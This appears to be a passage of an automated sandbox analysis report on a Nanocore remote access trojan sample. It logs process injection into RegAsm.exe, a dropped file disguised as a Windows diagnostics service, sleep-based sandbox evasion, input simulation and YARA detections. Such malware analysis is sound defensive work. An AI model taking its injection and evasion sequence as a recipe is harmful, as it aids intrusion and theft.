        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeWindow / User API: threadDelayed 7081Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 994Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 642Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: foregroundWindowGot 813Jump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batWindow / User API: threadDelayed 502Jump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe TID: 2412Thread sleep count: 7081 > 30Jump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe TID: 2412Thread sleep time: -70810s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5892Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5888Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 5072Thread sleep count: 502 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5332Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 2428Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeThread sleep count: Count: 7081 delay: -10Jump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00424696
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423D4E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004245C1 FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,2_2_004245C1
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C93C FindFirstFileW,FindClose,2_2_0042C93C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0042C9C7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F200
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F35D
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0042F65E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423A2B
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042BF27 FindFirstFileW,FindNextFileW,FindClose,2_2_0042BF27
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003C4AFE
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004341FD BlockInput,2_2_004341FD
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_003C3B4C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_003F5CCC
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0043C304 LoadLibraryA,GetProcAddress,2_2_0043C304
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeCode function: 0_3_038D00BE mov esi, dword ptr fs:[00000030h]0_3_038D00BE
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeCode function: 0_3_038D00BE mov esi, dword ptr fs:[00000030h]0_3_038D00BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_3_00E300BE mov esi, dword ptr fs:[00000030h]2_3_00E300BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_3_00E300BE mov esi, dword ptr fs:[00000030h]2_3_00E300BE
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_004181F7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EA364 SetUnhandledExceptionFilter,2_2_003EA364
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003EA395
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject code into remote processesShow sources
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeCode function: 0_3_038D00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,0_3_038D00BE
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 88B008Jump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 11FD008Jump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00418C93 LogonUserW,2_2_00418C93
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_003C3B4C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_003C4A35
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424EC9 mouse_event,2_2_00424EC9
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_004181F7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00424C03
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: Shell_TrayWnd
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003E886B cpuid 2_2_003E886B
        Source: C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_003F50D7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00402230 GetUserNameW,2_2_00402230
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003F418A _strlen,_strlen,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_003F418A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_003C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003C4AFE
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
        Source: Yara matchFile source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_81
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_XP
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_XPe
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_VISTA
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_7
        Source: DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: WIN_8
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exe, 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
